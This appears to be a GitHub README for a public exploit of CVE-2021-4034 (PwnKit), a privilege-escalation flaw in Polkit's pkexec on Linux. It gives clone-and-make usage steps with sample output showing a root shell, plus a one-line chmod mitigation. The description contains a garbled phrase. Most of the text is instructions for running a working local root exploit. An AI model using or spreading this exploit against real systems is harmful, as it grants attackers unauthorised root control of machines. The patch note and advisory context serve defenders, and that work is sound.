/CVE-2021-4034

Linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.

Primary LanguageC

CVE-2021-4034 Exploit

Usage

$ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git
$ cd CVE-2021-4034
$ make
[!] CVE-2021-4034 Exploit By whokilleddb
[!] Initializing Setup
[+] Setup Done :D
[!] Setting Root Privileges
[!] Launching Root Shell
# /bin/whoami
root

Rough Patch

# chmod 0755 `which pkexec`

Note: You can configure the options by playing around with include/config.h